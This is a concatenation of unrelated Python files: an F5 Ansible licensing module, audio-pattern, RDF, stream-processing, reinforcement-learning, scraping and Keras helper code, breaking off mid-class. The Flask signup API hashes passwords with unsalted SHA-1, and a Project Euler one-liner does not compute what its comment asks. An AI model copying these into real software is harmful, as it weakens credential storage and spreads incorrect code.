    iren = vtk.vtkRenderWindowInteractor()
    iren.SetRenderWindow(renWin)
    # Add the actors to the renderer, set the background and size
    #
    ren1.AddViewProp(actor)
    ren1.AddViewProp(labelActor)
    ren1.SetBackground(0, 0, 0)

    renWin.SetSize(300, 300)

    renWin.Render()
    try:
        os.remove(fname)
    except OSError:
        pass

    # render the image
    #
#    iren.Start()

except IOError:
    print  "Unable to test the writer/reader."

import uuid

from uqbar.objects import new

from supriya.patterns.Pattern import Pattern


class EventPattern(Pattern):

    ### CLASS VARIABLES ###

    __slots__ = ()

    ### SPECIAL METHODS ###

    def _coerce_iterator_output(self, expr, state=None):
        import supriya.patterns

        if not isinstance(expr, supriya.patterns.Event):
            expr = supriya.patterns.NoteEvent(**expr)
        if expr.get("uuid") is None:
            expr = new(expr, uuid=uuid.uuid4())
        return expr

    ### PUBLIC METHODS ###

    def play(self, clock=None, server=None):
        import supriya.patterns
        import supriya.realtime

        event_player = supriya.patterns.RealtimeEventPlayer(
            self, clock=clock, server=server or supriya.realtime.Server.default()
        )
        event_player.start()
        return event_player

    def with_bus(self, calculation_rate="audio", channel_count=None, release_time=0.25):
        import supriya.patterns

        return supriya.patterns.Pbus(
            self,
            calculation_rate=calculation_rate,
            channel_count=channel_count,
            release_time=release_time,
        )

    def with_effect(self, synthdef, release_time=0.25, **settings):
        import supriya.patterns

        return supriya.patterns.Pfx(
            self, synthdef=synthdef, release_time=release_time, **settings
        )

    def with_group(self, release_time=0.25):
        import supriya.patterns

        return supriya.patterns.Pgroup(self, release_time=release_time)

#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type

DOCUMENTATION = r'''
---
module: bigiq_regkey_license_assignment
short_description: Manage regkey license assignment on BIG-IPs from a BIG-IQ
description:
  - Manages the assignment of regkey licenses on a BIG-IQ. Assignment means
    the license is assigned to a BIG-IP, or it needs to be assigned to a BIG-IP.
    Additionally, this module supports revoking the assignments from BIG-IP devices.
version_added: "1.0.0"
options:
  pool:
    description:
      - The registration key pool to use.
    type: str
    required: True
  key:
    description:
      - The registration key you want to assign from the pool.
    type: str
    required: True
  device:
    description:
      - When C(managed) is C(no), specifies the address, or hostname, where the BIG-IQ
        can reach the remote device to register.
      - When C(managed) is C(yes), specifies the managed device, or device UUID, that
        you want to register.
      - If C(managed) is C(yes), it is very important you do not have more than
        one device with the same name. BIG-IQ internally recognizes devices by their ID,
        and therefore, this module cannot guarantee the correct device will be
        registered. The device returned is the device that is used.
    type: str
    required: True
  managed:
    description:
      - Whether the specified device is a managed or un-managed device.
      - When C(state) is C(present), this parameter is required.
    type: bool
  device_port:
    description:
      - Specifies the port of the remote device to connect to.
      - If this parameter is not specified, the default is C(443).
    type: int
    default: 443
  device_username:
    description:
      - The username used to connect to the remote device.
      - This username should be one that has sufficient privileges on the remote device
        to do licensing. Usually this is the C(Administrator) role.
      - When C(managed) is C(no), this parameter is required.
    type: str
  device_password:
    description:
      - The password of the C(device_username).
      - When C(managed) is C(no), this parameter is required.
    type: str
  state:
    description:
      - When C(present), ensures the device is assigned the specified license.
      - When C(absent), ensures the license is revoked from the remote device and freed
        on the BIG-IQ.
    type: str
    choices:
      - present
      - absent
    default: present
extends_documentation_fragment: f5networks.f5_modules.f5
author:
  - Tim Rupp (@caphrim007)
'''

EXAMPLES = r'''
- name: Register an unmanaged device
  bigiq_regkey_license_assignment:
    pool: my-regkey-pool
    key: XXXX-XXXX-XXXX-XXXX-XXXX
    device: 1.1.1.1
    managed: no
    device_username: admin
    device_password: secret
    state: present
    provider:
      user: admin
      password: secret
      server: lb.mydomain.com
  delegate_to: localhost

- name: Register a managed device, by name
  bigiq_regkey_license_assignment:
    pool: my-regkey-pool
    key: XXXX-XXXX-XXXX-XXXX-XXXX
    device: bigi1.foo.com
    managed: yes
    state: present
    provider:
      user: admin
      password: secret
      server: lb.mydomain.com
  delegate_to: localhost

- name: Register a managed device, by UUID
  bigiq_regkey_license_assignment:
    pool: my-regkey-pool
    key: XXXX-XXXX-XXXX-XXXX-XXXX
    device: 7141a063-7cf8-423f-9829-9d40599fa3e0
    managed: yes
    state: present
    provider:
      user: admin
      password: secret
      server: lb.mydomain.com
  delegate_to: localhost
'''

RETURN = r'''
# only common fields returned
'''

import re
import time
from datetime import datetime

from ansible.module_utils.basic import AnsibleModule

from ..module_utils.bigip import F5RestClient
from ..module_utils.common import (
    F5ModuleError, AnsibleF5Parameters, f5_argument_spec
)
from ..module_utils.icontrol import bigiq_version
from ..module_utils.ipaddress import is_valid_ip
from ..module_utils.teem import send_teem


class Parameters(AnsibleF5Parameters):
    api_map = {
        'deviceReference': 'device_reference',
        'deviceAddress': 'device_address',
        'httpsPort': 'device_port'
    }

    api_attributes = [
        'deviceReference', 'deviceAddress', 'httpsPort', 'managed'
    ]

    returnables = [
        'device_address', 'device_reference', 'device_username', 'device_password',
        'device_port', 'managed'
    ]

    updatables = [
        'device_reference', 'device_address', 'device_username', 'device_password',
        'device_port', 'managed'
    ]

    def to_return(self):
        result = {}
        try:
            for returnable in self.returnables:
                result[returnable] = getattr(self, returnable)
            result = self._filter_params(result)
        except Exception:
            raise
        return result


class ApiParameters(Parameters):
    pass


class ModuleParameters(Parameters):
    @property
    def device_password(self):
        if self._values['device_password'] is None:
            return None
        return self._values['device_password']

    @property
    def device_username(self):
        if self._values['device_username'] is None:
            return None
        return self._values['device_username']

    @property
    def device_address(self):
        if self.device_is_address:
            return self._values['device']

    @property
    def device_port(self):
        if self._values['device_port'] is None:
            return None
        return int(self._values['device_port'])

    @property
    def device_is_address(self):
        if is_valid_ip(self.device):
            return True
        return False

    @property
    def device_is_id(self):
        pattern = r'[A-Za-z0-9]{8}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{4}-[A-Za-z0-9]{12}'
        if re.match(pattern, self.device):
            return True
        return False

    @property
    def device_is_name(self):
        if not self.device_is_address and not self.device_is_id:
            return True
        return False

    @property
    def device_reference(self):
        if not self.managed:
            return None
        if self.device_is_address:
            # This range lookup is how you do lookups for single IP addresses. Weird.
            filter = "address+eq+'{0}...{0}'".format(self.device)
        elif self.device_is_name:
            filter = "hostname+eq+'{0}'".format(self.device)
        elif self.device_is_id:
            filter = "uuid+eq+'{0}'".format(self.device)
        else:
            raise F5ModuleError(
                "Unknown device format '{0}'".format(self.device)
            )

        uri = "https://{0}:{1}/mgmt/shared/resolver/device-groups/cm-bigip-allBigIpDevices/devices/" \
              "?$filter={2}&$top=1".format(self.client.provider['server'],
                                           self.client.provider['server_port'], filter)
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if resp.status == 200 and response['totalItems'] == 0:
            raise F5ModuleError(
                "No device with the specified address was found."
            )
        elif 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp._content)
        id = response['items'][0]['uuid']
        result = dict(
            link='https://localhost/mgmt/shared/resolver/device-groups/cm-bigip-allBigIpDevices/devices/{0}'.format(id)
        )
        return result

    @property
    def pool_id(self):
        filter = "(name%20eq%20'{0}')".format(self.pool)
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses?$filter={2}&$top=1'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            filter
        )
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))
        if resp.status == 200 and response['totalItems'] == 0:
            raise F5ModuleError(
                "No pool with the specified name was found."
            )
        elif 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp._content)
        return response['items'][0]['id']

    @property
    def member_id(self):
        if self.device_is_address:
            # This range lookup is how you do lookups for single IP addresses. Weird.
            filter = "deviceAddress+eq+'{0}...{0}'".format(self.device)
        elif self.device_is_name:
            filter = "deviceName+eq+'{0}'".format(self.device)
        elif self.device_is_id:
            filter = "deviceMachineId+eq+'{0}'".format(self.device)
        else:
            raise F5ModuleError(
                "Unknown device format '{0}'".format(self.device)
            )
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/' \
              '?$filter={4}'.format(self.client.provider['server'], self.client.provider['server_port'],
                                    self.pool_id, self.key, filter)
        resp = self.client.api.get(uri)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))

        if resp.status == 200 and response['totalItems'] == 0:
            return None
        elif 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp._content)
        result = response['items'][0]['id']
        return result


class Changes(Parameters):
    pass


class UsableChanges(Changes):
    @property
    def device_port(self):
        if self._values['managed']:
            return None
        return self._values['device_port']

    @property
    def device_username(self):
        if self._values['managed']:
            return None
        return self._values['device_username']

    @property
    def device_password(self):
        if self._values['managed']:
            return None
        return self._values['device_password']

    @property
    def device_reference(self):
        if not self._values['managed']:
            return None
        return self._values['device_reference']

    @property
    def device_address(self):
        if self._values['managed']:
            return None
        return self._values['device_address']

    @property
    def managed(self):
        return None


class ReportableChanges(Changes):
    pass


class Difference(object):
    def __init__(self, want, have=None):
        self.want = want
        self.have = have

    def compare(self, param):
        try:
            result = getattr(self, param)
            return result
        except AttributeError:
            return self.__default(param)

    def __default(self, param):
        attr1 = getattr(self.want, param)
        try:
            attr2 = getattr(self.have, param)
            if attr1 != attr2:
                return attr1
        except AttributeError:
            return attr1


class ModuleManager(object):
    def __init__(self, *args, **kwargs):
        self.module = kwargs.get('module', None)
        self.client = F5RestClient(**self.module.params)
        self.want = ModuleParameters(params=self.module.params, client=self.client)
        self.have = ApiParameters()
        self.changes = UsableChanges()

    def _set_changed_options(self):
        changed = {}
        for key in Parameters.returnables:
            if getattr(self.want, key) is not None:
                changed[key] = getattr(self.want, key)
        if changed:
            self.changes = UsableChanges(params=changed)

    def _update_changed_options(self):
        diff = Difference(self.want, self.have)
        updatables = Parameters.updatables
        changed = dict()
        for k in updatables:
            change = diff.compare(k)
            if change is None:
                continue
            else:
                if isinstance(change, dict):
                    changed.update(change)
                else:
                    changed[k] = change
        if changed:
            self.changes = UsableChanges(params=changed)
            return True
        return False

    def should_update(self):
        result = self._update_changed_options()
        if result:
            return True
        return False

    def exec_module(self):
        start = datetime.now().isoformat()
        version = bigiq_version(self.client)
        changed = False
        result = dict()
        state = self.want.state

        if state == "present":
            changed = self.present()
        elif state == "absent":
            changed = self.absent()

        reportable = ReportableChanges(params=self.changes.to_return())
        changes = reportable.to_return()
        result.update(**changes)
        result.update(dict(changed=changed))
        self._announce_deprecations(result)
        send_teem(start, self.module, version)
        return result

    def _announce_deprecations(self, result):
        warnings = result.pop('__warnings', [])
        for warning in warnings:
            self.module.deprecate(
                msg=warning['msg'],
                version=warning['version']
            )

    def present(self):
        if self.exists():
            return False
        return self.create()

    def exists(self):
        if self.want.member_id is None:
            return False
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/{4}'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.pool_id,
            self.want.key,
            self.want.member_id
        )
        resp = self.client.api.get(uri)
        if resp.status == 200:
            return True
        return False

    def remove(self):
        self._set_changed_options()
        if self.module.check_mode:
            return True
        self.remove_from_device()
        if self.exists():
            raise F5ModuleError("Failed to delete the resource.")
        # Artificial sleeping to wait for remote licensing (on BIG-IP) to complete
        #
        # This should be something that BIG-IQ can do natively in 6.1-ish time.
        time.sleep(60)
        return True

    def create(self):
        self._set_changed_options()
        if not self.want.managed:
            if self.want.device_username is None:
                raise F5ModuleError(
                    "You must specify a 'device_username' when working with unmanaged devices."
                )
            if self.want.device_password is None:
                raise F5ModuleError(
                    "You must specify a 'device_password' when working with unmanaged devices."
                )
        if self.module.check_mode:
            return True
        self.create_on_device()
        if not self.exists():
            raise F5ModuleError(
                "Failed to license the remote device."
            )
        self.wait_for_device_to_be_licensed()

        # Artificial sleeping to wait for remote licensing (on BIG-IP) to complete
        #
        # This should be something that BIG-IQ can do natively in 6.1-ish time.
        time.sleep(60)
        return True

    def create_on_device(self):
        params = self.changes.api_params()
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.pool_id,
            self.want.key
        )

        if not self.want.managed:
            params['username'] = self.want.device_username
            params['password'] = self.want.device_password

        resp = self.client.api.post(uri, json=params)
        try:
            response = resp.json()
        except ValueError as ex:
            raise F5ModuleError(str(ex))

        if 'code' in response and response['code'] == 400:
            if 'message' in response:
                raise F5ModuleError(response['message'])
            else:
                raise F5ModuleError(resp.content)

    def wait_for_device_to_be_licensed(self):
        count = 0
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/{4}'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.pool_id,
            self.want.key,
            self.want.member_id
        )
        while count < 3:
            resp = self.client.api.get(uri)
            try:
                response = resp.json()
            except ValueError as ex:
                raise F5ModuleError(str(ex))

            if 'code' in response and response['code'] == 400:
                if 'message' in response:
                    raise F5ModuleError(response['message'])
                else:
                    raise F5ModuleError(resp.content)
            if response['status'] == 'LICENSED':
                count += 1
            else:
                count = 0

    def absent(self):
        if self.exists():
            return self.remove()
        return False

    def remove_from_device(self):
        uri = 'https://{0}:{1}/mgmt/cm/device/licensing/pool/regkey/licenses/{2}/offerings/{3}/members/{4}'.format(
            self.client.provider['server'],
            self.client.provider['server_port'],
            self.want.pool_id,
            self.want.key,
            self.want.member_id
        )
        params = {}
        if not self.want.managed:
            params.update(self.changes.api_params())
            params['id'] = self.want.member_id
            params['username'] = self.want.device_username
            params['password'] = self.want.device_password
        self.client.api.delete(uri, json=params)


class ArgumentSpec(object):
    def __init__(self):
        self.supports_check_mode = True
        argument_spec = dict(
            pool=dict(required=True),
            key=dict(required=True, no_log=True),
            device=dict(required=True),
            managed=dict(type='bool'),
            device_port=dict(type='int', default=443),
            device_username=dict(no_log=True),
            device_password=dict(no_log=True),
            state=dict(default='present', choices=['absent', 'present'])
        )
        self.argument_spec = {}
        self.argument_spec.update(f5_argument_spec)
        self.argument_spec.update(argument_spec)
        self.required_if = [
            ['state', 'present', ['key', 'managed']],
            ['managed', False, ['device', 'device_username', 'device_password']],
            ['managed', True, ['device']]
        ]


def main():
    spec = ArgumentSpec()

    module = AnsibleModule(
        argument_spec=spec.argument_spec,
        supports_check_mode=spec.supports_check_mode,
        required_if=spec.required_if
    )

    try:
        mm = ModuleManager(module=module)
        results = mm.exec_module()
        module.exit_json(**results)
    except F5ModuleError as ex:
        module.fail_json(msg=str(ex))


if __name__ == '__main__':
    main()

'''

salt.utils
~~~~~~~~~~


'''



class lazy_property(object):
    '''
    meant to be used for lazy evaluation of an object attribute.
    property should represent non-mutable data, as it replaces itself.

    http://stackoverflow.com/a/6849299/564003
    '''

    def __init__(self, fget):
        self.fget = fget
        self.func_name = fget.__name__

    def __get__(self, obj, cls):
        if obj is None:
            return None
        value = self.fget(obj)
        setattr(obj, self.func_name, value)
        return value

import re
from setuptools import setup


def find_version(filename):
    _version_re = re.compile(r"__version__ = '(.*)'")
    for line in open(filename):
        version_match = _version_re.match(line)
        if version_match:
            return version_match.group(1)


__version__ = find_version('librdflib/__init__.py')

with open('README.md', 'rt') as f:
    long_description = f.read()

tests_require = ['pytest']
setup(
    name='librdflib',
    version=__version__,
    description='librdf parser for rdflib',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/tgbugs/pyontutils/tree/master/librdflib',
    author='Tom Gillespie',
    author_email='tgbugs@gmail.com',
    license='MIT',
    classifiers=[
        'Development Status :: 3 - Alpha',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3',
    ],
    keywords='rdflib librdf rdf parser parsing ttl rdfxml',
    packages=['librdflib'],
    python_requires='>=3',
    tests_require=tests_require,
    install_requires=[
        'rdflib',  # really 5.0.0 if my changes go in but dev < 5
    ],
    extras_require={'dev': ['pytest-cov', 'wheel'],
                    'test': tests_require,
    },
    entry_points={
        'rdf.plugins.parser': [
            'librdfxml = librdflib:libRdfxmlParser',
            'libttl = librdflib:libTurtleParser',
        ],
    },
)

"""This module contains examples of the op() function
where:
op(f,x) returns a stream where x is a stream, and f
is an operator on lists, i.e., f is a function from
a list to a list. These lists are of lists of arbitrary
objects other than streams and agents.

Function f must be stateless, i.e., for any lists u, v:
f(u.extend(v)) = f(u).extend(f(v))
(Stateful functions are given in OpStateful.py with
examples in ExamplesOpWithState.py.)

Let f be a stateless operator on lists and let x be a stream.
If at some point, the value of stream x is a list u then at
that point, the value of stream op(f,x) is the list f(u).
If at a later point, the value of stream x is the list:
u.extend(v) then, at that point the value of stream op(f,x)
is f(u).extend(f(v)).
 
As a specific example, consider the following f():
def f(lst): return [w * w for w in lst]
If at some point in time, the value of x is [3, 7],
then at that point the value of op(f,x) is f([3, 7])
or [9, 49]. If at a later point, the value of x is
[3, 7, 0, 11, 5] then the value of op(f,x) at that point
is f([3, 7, 0, 11, 5]) or [9, 49, 0, 121, 25].

"""
if __name__ == '__main__':
    if __package__ is None:
        import sys
        from os import path
        sys.path.append( path.dirname( path.dirname( path.abspath(__file__) ) ) )

from Agent import *
from ListOperators import *
from PrintFunctions import print_streams_recent

def example_1():
    print "example_1"
    print "op(f, x): f is a function from a list to a list"
    print "x is a stream \n"

    # FUNCTIONS FROM LIST TO LIST

    # This example uses the following list operators:
    # functions from a list to a list.
    # f, g, h, r


    # Example A: function using list comprehension
    def f(lst): return [w*w for w in lst]

    # Example B: function using filter
    threshold = 6
    def predicate(w):
        return w > threshold
    def g(lst):
        return filter(predicate, lst)

    # Example C: function using map
    # Raise each element of the list to the n-th power.   
    n = 3
    def power(w):
        return w**n
    def h(lst):
        return map(power, lst)

    # Example D: function using another list comprehension
    # Discard any element of x that is not a
    # multiple of a parameter n, and divide the
    # elements that are multiples of n by n.
    n = 3
    def r(lst):
        result = []
        for w in lst:
            if w%n == 0: result.append(w/n)
        return result

    
    


    # EXAMPLES OF OPERATIONS ON STREAMS
    
    # The input stream for these examples
    x = Stream('x')

    print 'x is the input stream.'
    print 'a is a stream consisting of the squares of the input'
    print 'b is the stream consisting of values that exceed 6'
    print 'c is the stream consisting of the third powers of the input'
    print 'd is the stream consisting of values that are multiples of 3 divided by 3'
    print 'newa is the same as a. It is defined in a more succinct fashion.'
    print 'newb has squares that exceed 6.'
    print ''

    # The output streams a, b, c, d obtained by
    # applying the list operators f, g, h, r to
    # stream x.
    a = op(f, x)
    b = op(g, x)
    c = op(h, x)
    d = op(r, x)

    # You can also define a function only on streams.
    # You can do this using functools in Python or
    # by simple encapsulation as shown below.
    def F(x): return op(f,x)
    def G(x): return op(g,x)
    newa = F(x)
    newb = G(F(x))
    # The advantage is that F is a function only
    # of streams. So, function composition looks cleaner
    # as in G(F(x))

    # Name the output streams to label the output
    # so that reading the output is easier.
    a.set_name('a')
    newa.set_name('newa')
    b.set_name('b')
    newb.set_name('newb')
    c.set_name('c')
    d.set_name('d')

    # At this point x is the empty stream:
    # its value is []
    x.extend([3, 7])
    # Now the value of x is [3, 7]
    print "FIRST STEP"
    print_streams_recent([x, a, b, c, d, newa, newb])
    print ""

    x.extend([0, 11, 15])
    # Now the value of x is [3, 7, 0, 11, 15]
    print "SECOND STEP"
    print_streams_recent([x, a, b, c, d, newa, newb])

def main():
    example_1()

if __name__ == '__main__':
    main()

## Close
### What is the value of the first triangle number to have over five hundred divisors?
print max([len(m) for m in map(lambda k: [n for n in range(1,(k+1)) if k%n == 0], [sum(range(n)) for n in range(1,1000)])])
from errors import *
from manager import SchemaManager

import random
from datetime import datetime
from multiprocessing import Pool

import numpy as np
from scipy.optimize import minimize


def worker_func(args):
    self = args[0]
    m = args[1]
    k = args[2]
    r = args[3]

    return (self.eval_func(m, k, r) -
            self.eval_func(m, k, self.rt) -
            self.temporal_diff_sum(m, k)) ** 2


def optimized_func_i_der(args):
    """
    The derivative of the optimized function with respect to the
    ith component of the vector r
    """
    self = args[0]
    r = args[1]
    i = args[2]

    result = 0
    M = len(self.data)

    for m in range(M):
        Nm = self.data[m].shape[0] - 1

        for k in range(Nm + 1):
            result += ((self.eval_func(m, k, r) -
                        self.eval_func(m, k, self.rt) -
                        self.temporal_diff_sum(m, k)) * 2 *
                       self.eval_func_der(m, k, r, i))

    return result


def worker_func_der(args):
    self = args[0]
    m = args[1]
    k = args[2]
    r = args[3]
    i = args[4]

    return ((self.eval_func(m, k, r) -
             self.eval_func(m, k, self.rt) -
             self.temporal_diff_sum(m, k)) * 2 *
            self.eval_func_der(m, k, r, i))


class Agent:
    num_features = 22

    def __init__(self):
        self.lf = 0.2  # Learning factor lambda
        self.data = []  # The features' values for all the games
        self.rewards = []  # Reward values for moving from 1 state to the next
        self.rt = np.array([])
        self.max_iter = 50

    def set_learning_factor(self, learning_factor):
        assert(learning_factor >= 0 and learning_factor <= 1)
        self.lf = learning_factor

    def set_rt(self, rt):
        assert(len(rt) == self.num_features)
        self.rt = rt

    def set_iter(self, max_iter):
        self.max_iter = max_iter

    def set_data(self, data):
        self.data = []
        self.rewards = []

        for game in data:
            game = np.vstack((game, np.zeros(self.num_features + 1)))
            self.data.append(game[:, :-1])
            self.rewards.append(game[:, -1:])

    def eval_func(self, m, k, r):
        """
        The evaluation function value for the set of weights (vector) r
        at the mth game and kth board state """
        return np.dot(r, self.data[m][k])

    def eval_func_der(self, m, k, r, i):
        """
        Find the derivative of the evaluation function with respect
        to the ith component of the vector r
        """
        return self.data[m][k][i]

    def get_reward(self, m, s):
        """
        Get reward for moving from state s to state (s + 1)
        """
        return self.rewards[m][s + 1][0]

    def temporal_diff(self, m, s):
        """
        The temporal diffence value for state s to state (s+1) in the mth game
        """
        return (self.get_reward(m, s) + self.eval_func(m, s + 1, self.rt) -
                self.eval_func(m, s, self.rt))

    def temporal_diff_sum(self, m, k):
        Nm = self.data[m].shape[0] - 1
        result = 0

        for s in range(k, Nm):
            result += self.lf**(s - k) * self.temporal_diff(m, s)

        return result

    def optimized_func(self, r):
        result = 0
        M = len(self.data)
        pool = Pool(processes=4)

        for m in range(M):
            Nm = self.data[m].shape[0] - 1

            k_args = range(Nm + 1)
            self_args = [self] * len(k_args)
            m_args = [m] * len(k_args)
            r_args = [r] * len(k_args)

            result += sum(pool.map(worker_func,
                                   zip(self_args, m_args, k_args, r_args)))

        return result

    def optimized_func_i_der(self, r, i):
        """
        The derivative of the optimized function with respect to the
        ith component of the vector r
        """
        result = 0
        M = len(self.data)

        for m in range(M):
            Nm = self.data[m].shape[0] - 1

            for k in range(Nm + 1):
                result += ((self.eval_func(m, k, r) -
                            self.eval_func(m, k, self.rt) -
                            self.temporal_diff_sum(m, k)) * 2 *
                           self.eval_func_der(m, k, r, i))
        return result

    def optimized_func_der(self, r):
        p = Pool(processes=4)

        self_args = [self] * len(r)
        i_args = range(len(r))
        r_args = [r] * len(r)

        return np.array(p.map(optimized_func_i_der,
                              zip(self_args, r_args, i_args)))

    def callback(self, r):
        print("Iteration %d completed at %s" %
              (self.cur_iter, datetime.now().strftime("%d/%m/%Y %H:%M:%S")))
        self.cur_iter += 1

    def compute_next_rt(self):
        print("Start computing at %s" %
              (datetime.now().strftime("%d/%m/%Y %H:%M:%S")))

        self.cur_iter = 1

        r0 = np.array([random.randint(-10, 10)
                       for i in range(self.num_features)])

        res = minimize(self.optimized_func, r0, method='BFGS',
                       jac=self.optimized_func_der,
                       options={'maxiter': self.max_iter, 'disp': True},
                       callback=self.callback)

        return res.x

# -*- coding: utf-8 -*-

""""
ProjectName: pydemi
Repo: https://github.com/chrisenytc/pydemi
Copyright (c) 2014 Christopher EnyTC
Licensed under the MIT license.
"""

# Dependencies
import uuid
from api import app
from hashlib import sha1
from flask import request
from flask import jsonify as JSON
from api.models.user import User
from cors import cors


@app.route('/signup', methods=['POST'])
@cors(origin='*', methods=['POST'])
def signup():
    # Create new user
    new_user = User()
    new_user.name = request.form['name']
    new_user.email = request.form['email']
    new_user.password = sha1(request.form['password']).hexdigest()
    new_user.token = str(uuid.uuid4())
    new_user.save()
    return JSON(message='User created successfully')


@app.route('/signin', methods=['POST'])
@cors(origin='*', methods=['POST'])
def signin():
    # Retorna a user data
    user_info = User.objects(email=request.form['email'], password=sha1(
        request.form['password']).hexdigest())
    if user_info.count():
        return JSON(token=user_info.get().token, roles=user_info.get().roles)
    else:
        return JSON(message='User not found')

team_mapping = {
    "SY": "Sydney",
    "WB": "Western Bulldogs",
    "WC": "West Coast",
    "HW": "Hawthorn",
    "GE": "Geelong",
    "FR": "Fremantle",
    "RI": "Richmond",
    "CW": "Collingwood",
    "CA": "Carlton",
    "GW": "Greater Western Sydney",
    "AD": "Adelaide",
    "GC": "Gold Coast",
    "ES": "Essendon",
    "ME": "Melbourne",
    "NM": "North Melbourne",
    "PA": "Port Adelaide",
    "BL": "Brisbane Lions",
    "SK": "St Kilda"
}

def get_team_name(code):
    return team_mapping[code]

def get_team_code(full_name):
    for code, name in team_mapping.items():
        if name == full_name:
            return code
    return full_name

def get_match_description(response):
    match_container = response.xpath("//td[@colspan = '5' and @align = 'center']")[0]
    match_details = match_container.xpath(".//text()").extract()
    return {
        "round": match_details[1],
        "venue": match_details[3],
        "date": match_details[6],
        "attendance": match_details[8],
        "homeTeam": response.xpath("(//a[contains(@href, 'teams/')])[1]/text()").extract_first(),
        "awayTeam": response.xpath("(//a[contains(@href, 'teams/')])[2]/text()").extract_first(),
        "homeScore": int(response.xpath("//table[1]/tr[2]/td[5]/b/text()").extract_first()),
        "awayScore": int(response.xpath("//table[1]/tr[3]/td[5]/b/text()").extract_first())
    }

def get_match_urls(response):
    for match in response.xpath("//a[contains(@href, 'stats/games/')]/@href").extract():
                yield response.urljoin(match)
from keras.applications import imagenet_utils
from keras.applications import mobilenet


def dummyPreprocessInput(image):
    image -= 127.5
    return image


def getPreprocessFunction(preprocessType):

    if preprocessType == "dummy":
        return dummyPreprocessInput
    elif preprocessType == "mobilenet":
        return mobilenet.preprocess_input
    elif preprocessType == "imagenet":
        return imagenet_utils.preprocess_input
    else:
        raise Exception(preprocessType + " not supported")

#!/usr/bin/python
# -*- coding: utf-8 -*-
__author__ = 'ar'

from layers_basic import LW_Layer, default_data_format
from layers_convolutional import conv_output_length

###############################################
class _LW_Pooling1D(LW_Layer):
    input_dim = 3
    def __init__(self, pool_size=2, strides=None, padding='valid'):
        if strides is None:
            strides = pool_size
        assert padding in {'valid', 'same'}, 'border_mode must be in {valid, same}'
        self.pool_length = pool_size
        self.stride = strides
        self.border_mode = padding
    def get_output_shape_for(self, input_shape):
        length = conv_output_length(input_shape[1], self.pool_length, self.border_mode, self.stride)
        return (input_shape[0], length, input_shape[2])

class LW_MaxPooling1D(_LW_Pooling1D):
    def __init__(self, pool_size=2, strides=None, padding='valid'):
        super(LW_MaxPooling1D, self).__init__(pool_size, strides, padding)

class LW_AveragePooling1D(_LW_Pooling1D):
    def __init__(self, pool_size=2, strides=None, padding='valid'):
        super(LW_AveragePooling1D, self).__init__(pool_size, strides, padding)

###############################################
class _LW_Pooling2D(LW_Layer):
    def __init__(self, pool_size=(2, 2), strides=None, padding='valid', data_format='default'):
        if data_format == 'default':
            data_format = default_data_format
        assert data_format in {'channels_last', 'channels_first'}, 'data_format must be in {channels_last, channels_first}'
        self.pool_size = tuple(pool_size)
        if strides is None:
            strides = self.pool_size
        self.strides = tuple(strides)
        assert padding in {'valid', 'same'}, 'border_mode must be in {valid, same}'
        self.border_mode = padding
        self.dim_ordering = data_format
    def get_output_shape_for(self, input_shape):
        if self.dim_ordering == 'channels_first':
            rows = input_shape[2]
            cols = input_shape[3]
        elif self.dim_ordering == 'channels_last':
            rows = input_shape[1]
            cols = input_shape[2]
        else:
            raise Exception('Invalid dim_ordering: ' + self.dim_ordering)
        rows = conv_output_length(rows, self.pool_size[0], self.border_mode, self.strides[0])
        cols = conv_output_length(cols, self.pool_size[1], self.border_mode, self.strides[1])
        if self.dim_ordering == 'channels_first':
            return (input_shape[0], input_shape[1], rows, cols)
        elif self.dim_ordering == 'channels_last':
            return (input_shape[0], rows, cols, input_shape[3])
        else:
            raise Exception('Invalid dim_ordering: ' + self.dim_ordering)

class LW_MaxPooling2D(_LW_Pooling2D):
    def __init__(self, pool_size=(2, 2), strides=None, padding='valid', data_format='default'):
        super(LW_MaxPooling2D, self).__init__(pool_size, strides, padding, data_format)

class LW_AveragePooling2D(_LW_Pooling2D):
    def __init__(self, pool_size=(2, 2), strides=None, padding='valid', data_format='default'):
        super(LW_AveragePooling2D, self).__init__(pool_size, strides, padding, data_format)

###############################################
class _LW_Pooling3D(LW_Layer):
    def __init__(self, pool_size=(2, 2, 2), strides=None, border_mode='valid', dim_ordering='default'):
        if dim_ordering == 'default':
            dim_ordering = default_data_format
        assert dim_ordering in {'channels_last', 'channels_first'}, 'data_format must be in {channels_last, channels_first}'
        self.pool_size = tuple(pool_size)
        if strides is None:
            strides = self.pool_size
        self.strides = tuple(strides)
        assert border_mode in {'valid', 'same'}, 'border_mode must be in {valid, same}'
        self.border_mode = border_mode
        self.dim_ordering = dim_ordering
    def get_output_shape_for(self, input_shape):
        if self.dim_ordering == 'channels_first':
            len_dim1 = input_shape[2]
            len_dim2 = input_shape[3]
            len_dim3 = input_shape[4]
        elif self.dim_ordering == 'channels_last':
            len_dim1 = input_shape[1]
